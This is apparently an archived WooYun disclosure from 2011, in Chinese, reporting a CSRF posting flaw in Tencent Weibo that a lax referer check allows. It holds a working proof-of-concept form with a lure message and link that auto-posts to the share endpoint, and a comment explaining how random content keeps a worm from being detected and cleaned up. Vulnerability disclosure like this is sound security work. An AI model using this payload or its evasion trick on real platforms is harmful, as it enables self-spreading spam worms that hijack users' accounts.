腾讯微博一处referer限制不严的csrf发帖漏洞

编号2157
Urlhttp://www.wooyun.org/bug.php?action=view&id=2157
漏洞状态厂商已经确认
漏洞标题腾讯微博一处referer限制不严的csrf发帖漏洞
漏洞类型CSRF
厂商腾讯
白帽子呆子不开口
提交日期2011-05-20 16:15:00
公开日期2011-06-19 21:00:00
修复时间(not set)
确认时间2011-05-22 00:00:00
Confirm Spend2
漏洞标签csrf利用技巧 csrf蠕虫 sns类型应用csrf csrf漏洞利用
关注数0
收藏数0
白帽评级
白帽自评rank7
厂商评级
厂商评rank6
漏洞简介
腾讯微博一处csrf发帖漏洞,referer限制不严,可以传播蠕虫
漏洞细节

腾讯微博一处csrf发帖漏洞,referer限制不严,可以传播蠕虫

POC

一键转发微博的地方,若来源页为http://v.t.qq.com.fffffffff.me/myform.php,则绕过referer过滤

<form action="http://v.t.qq.com/cgi-bin/share" method="post" name="myform" id="myform">
<input type="hidden" name="content" value="这个姑娘的胸好美啊 http://lvwei.me <?php echo rand(1,1000000);?>"/>
<input type="hidden" name="url" value="http%3A%2F%2Fipad.qq.com%2Ftopic%2Findex.htm"/>
<input type="hidden" name="appkey" value="9172f1efc7614f399196804ae5f5e31b"/>
<input type="hidden" name="source" value=""/>
<input type="hidden" name="site" value="ipad.qq.com"/>
<input type="hidden" name="pic" value=""/>
<input type="hidden" name="flag" value="0"/>
</form>

修复方案

referer过滤严格点

状态信息 2011-05-20: 细节已通知厂商并且等待厂商处理中
2011-05-22: 厂商已经确认,细节仅向厂商公开
2011-06-01: 细节向核心白帽子及相关领域专家公开
2011-06-11: 细节向普通白帽子公开
2011-06-21: 细节向实习白帽子公开
2011-06-19: 细节向公众公开
厂商回复添加对漏洞的补充说明以及做出评价的理由
回应信息危害等级:中漏洞Rank:6 确认时间:2011-05-22 18:54
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

@呆子不开口 soga。。好人一生平安

Passer_by02013-04-09 17:36:00

@Passer_by 首先我自己测试的时候,微博是不让短时间内发同样的内容的。当大量用户都这么发时,可以防止对方监测出这种蠕虫的行为。再有可以给对方的批量清理带来麻烦,增加你蠕虫的存活时间

呆子不开口02013-04-09 15:42:00

@xsser 为什么要<?php echo rand(1,1000000);?>

Passer_by02013-04-09 12:10:00

这个姑娘的胸毛好美啊

Spy198x02013-01-24 03:35:00

这个姑娘的胸好美啊

piaoye02011-09-06 17:31:00

这不就是蠕虫么

xsser02011-05-20 20:27:00

坐等···

pg5yl802011-05-20 18:22:00